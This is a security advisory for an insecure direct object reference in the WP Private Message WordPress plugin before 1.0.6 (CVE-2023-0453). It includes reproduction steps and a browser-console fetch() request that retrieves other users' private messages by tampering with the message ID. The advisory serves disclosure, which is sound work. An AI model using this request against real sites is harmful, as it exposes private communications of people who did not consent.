Lucene search
Veshraj GhimireWPEX-ID:F915E5AC-E216-4D1C-AEC1-C3BE11E2A6DEHistoryJan 30, 2023 - 12:00 a.m.
WP Private Message < 1.0.6 - Private Message Disclosure via IDOR
2023-01-3000:00:00
Veshraj Ghimire
69
wordpress
private message
idor
security
exploit
EPSS
0.001
Percentile
25.5%
The plugin (bundled with the Superio theme as a required plugin) does not ensure that private messages to be accessed belong to the user making the requests. This allowing any authenticated users to access private messages belonging to other users by tampering the ID.
- Install the Superio theme and its WP Private Message bundled plugin.
- Create a new private message in the backend.
- Log in as a different user.
- Generate a nonce for the logged-in user.
- From the browser console, run the following request, replacing the NONCE and MESSAGE_ID:
```
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=wp_private_message_choose_message&nonce=NONCE&message_id=MESSAGE_ID",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
```
- See the message data.Related
cvelist
cvelist
wpvulndb
wpvulndb
WP Private Message < 1.0.6 - Private Message Disclosure via IDOR
2023-01-30 00:00:00
prion
prion
Code injection
2023-02-21 09:15:00
nvd
nvd
CVE-2023-0453
2023-02-21 09:15:13
cve
cve
CVE-2023-0453
2023-02-21 09:15:13
wordfence
wordfence